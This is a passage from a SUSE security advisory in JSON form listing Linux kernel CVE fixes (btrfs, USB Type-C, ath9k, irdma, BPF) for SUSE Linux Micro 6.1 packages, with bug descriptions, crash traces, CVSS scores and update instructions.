"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54296"
},
{
"cve": "CVE-2023-54297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: fix memory leak after finding block group with super blocks\n\nAt exclude_super_stripes(), if we happen to find a block group that has\nsuper blocks mapped to it and we are on a zoned filesystem, we error out\nas this is not supposed to happen, indicating either a bug or maybe some\nmemory corruption for example. However we are exiting the function without\nfreeing the memory allocated for the logical address of the super blocks.\nFix this by freeing the logical address.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54297",
"url": "https://www.suse.com/security/cve/CVE-2023-54297"
},
{
"category": "external",
"summary": "SUSE Bug 1255795 for CVE-2023-54297",
"url": "https://bugzilla.suse.com/1255795"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54297"
},
{
"cve": "CVE-2023-54299",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54299"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: bus: verify partner exists in typec_altmode_attention\n\nSome usb hubs will negotiate DisplayPort Alt mode with the device\nbut will then negotiate a data role swap after entering the alt\nmode. The data role swap causes the device to unregister all alt\nmodes, however the usb hub will still send Attention messages\neven after failing to reregister the Alt Mode. type_altmode_attention\ncurrently does not verify whether or not a device\u0027s altmode partner\nexists, which results in a NULL pointer error when dereferencing\nthe typec_altmode and typec_altmode_ops belonging to the altmode\npartner.\n\nVerify the presence of a device\u0027s altmode partner before sending\nthe Attention message to the Alt Mode driver.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54299",
"url": "https://www.suse.com/security/cve/CVE-2023-54299"
},
{
"category": "external",
"summary": "SUSE Bug 1255789 for CVE-2023-54299",
"url": "https://bugzilla.suse.com/1255789"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54299"
},
{
"cve": "CVE-2023-54300",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54300"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath9k: avoid referencing uninit memory in ath9k_wmi_ctrl_rx\n\nFor the reasons also described in commit b383e8abed41 (\"wifi: ath9k: avoid\nuninit memory read in ath9k_htc_rx_msg()\"), ath9k_htc_rx_msg() should\nvalidate pkt_len before accessing the SKB.\n\nFor example, the obtained SKB may have been badly constructed with\npkt_len = 8. In this case, the SKB can only contain a valid htc_frame_hdr\nbut after being processed in ath9k_htc_rx_msg() and passed to\nath9k_wmi_ctrl_rx() endpoint RX handler, it is expected to have a WMI\ncommand header which should be located inside its data payload.\n\nImplement sanity checking inside ath9k_wmi_ctrl_rx(). Otherwise, uninit\nmemory can be referenced.\n\nTested on Qualcomm Atheros Communications AR9271 802.11n .\n\nFound by Linux Verification Center (linuxtesting.org) with Syzkaller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54300",
"url": "https://www.suse.com/security/cve/CVE-2023-54300"
},
{
"category": "external",
"summary": "SUSE Bug 1255790 for CVE-2023-54300",
"url": "https://bugzilla.suse.com/1255790"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54300"
},
{
"cve": "CVE-2023-54302",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54302"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: Fix data race on CQP completion stats\n\nCQP completion statistics is read lockesly in irdma_wait_event and\nirdma_check_cqp_progress while it can be updated in the completion\nthread irdma_sc_ccq_get_cqe_info on another CPU as KCSAN reports.\n\nMake completion statistics an atomic variable to reflect coherent updates\nto it. This will also avoid load/store tearing logic bug potentially\npossible by compiler optimizations.\n\n[77346.170861] BUG: KCSAN: data-race in irdma_handle_cqp_op [irdma] / irdma_sc_ccq_get_cqe_info [irdma]\n\n[77346.171383] write to 0xffff8a3250b108e0 of 8 bytes by task 9544 on cpu 4:\n[77346.171483] irdma_sc_ccq_get_cqe_info+0x27a/0x370 [irdma]\n[77346.171658] irdma_cqp_ce_handler+0x164/0x270 [irdma]\n[77346.171835] cqp_compl_worker+0x1b/0x20 [irdma]\n[77346.172009] process_one_work+0x4d1/0xa40\n[77346.172024] worker_thread+0x319/0x700\n[77346.172037] kthread+0x180/0x1b0\n[77346.172054] ret_from_fork+0x22/0x30\n\n[77346.172136] read to 0xffff8a3250b108e0 of 8 bytes by task 9838 on cpu 2:\n[77346.172234] irdma_handle_cqp_op+0xf4/0x4b0 [irdma]\n[77346.172413] irdma_cqp_aeq_cmd+0x75/0xa0 [irdma]\n[77346.172592] irdma_create_aeq+0x390/0x45a [irdma]\n[77346.172769] irdma_rt_init_hw.cold+0x212/0x85d [irdma]\n[77346.172944] irdma_probe+0x54f/0x620 [irdma]\n[77346.173122] auxiliary_bus_probe+0x66/0xa0\n[77346.173137] really_probe+0x140/0x540\n[77346.173154] __driver_probe_device+0xc7/0x220\n[77346.173173] driver_probe_device+0x5f/0x140\n[77346.173190] __driver_attach+0xf0/0x2c0\n[77346.173208] bus_for_each_dev+0xa8/0xf0\n[77346.173225] driver_attach+0x29/0x30\n[77346.173240] bus_add_driver+0x29c/0x2f0\n[77346.173255] driver_register+0x10f/0x1a0\n[77346.173272] __auxiliary_driver_register+0xbc/0x140\n[77346.173287] irdma_init_module+0x55/0x1000 [irdma]\n[77346.173460] do_one_initcall+0x7d/0x410\n[77346.173475] do_init_module+0x81/0x2c0\n[77346.173491] load_module+0x1232/0x12c0\n[77346.173506] __do_sys_finit_module+0x101/0x180\n[77346.173522] __x64_sys_finit_module+0x3c/0x50\n[77346.173538] do_syscall_64+0x39/0x90\n[77346.173553] entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\n[77346.173634] value changed: 0x0000000000000094 -\u003e 0x0000000000000095",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54302",
"url": "https://www.suse.com/security/cve/CVE-2023-54302"
},
{
"category": "external",
"summary": "SUSE Bug 1255792 for CVE-2023-54302",
"url": "https://bugzilla.suse.com/1255792"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54302"
},
{
"cve": "CVE-2023-54303",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54303"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Disable preemption in bpf_perf_event_output\n\nThe nesting protection in bpf_perf_event_output relies on disabled\npreemption, which is guaranteed for kprobes and tracepoints.\n\nHowever bpf_perf_event_output can be also called from uprobes context\nthrough bpf_prog_run_array_sleepable function which disables migration,\nbut keeps preemption enabled.\n\nThis can cause task to be preempted by another one inside the nesting\nprotection and lead eventually to two tasks using same perf_sample_data\nbuffer and cause crashes like:\n\n kernel tried to execute NX-protected page - exploit attempt? (uid: 0)\n BUG: unable to handle page fault for address: ffffffff82be3eea\n ...\n Call Trace:\n ? __die+0x1f/0x70\n ? page_fault_oops+0x176/0x4d0\n ? exc_page_fault+0x132/0x230\n ? asm_exc_page_fault+0x22/0x30\n ? perf_output_sample+0x12b/0x910\n ? perf_event_output+0xd0/0x1d0\n ? bpf_perf_event_output+0x162/0x1d0\n ? bpf_prog_c6271286d9a4c938_krava1+0x76/0x87\n ? __uprobe_perf_func+0x12b/0x540\n ? uprobe_dispatcher+0x2c4/0x430\n ? uprobe_notify_resume+0x2da/0xce0\n ? atomic_notifier_call_chain+0x7b/0x110\n ? exit_to_user_mode_prepare+0x13e/0x290\n ? irqentry_exit_to_user_mode+0x5/0x30\n ? asm_exc_int3+0x35/0x40\n\nFixing this by disabling preemption in bpf_perf_event_output.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
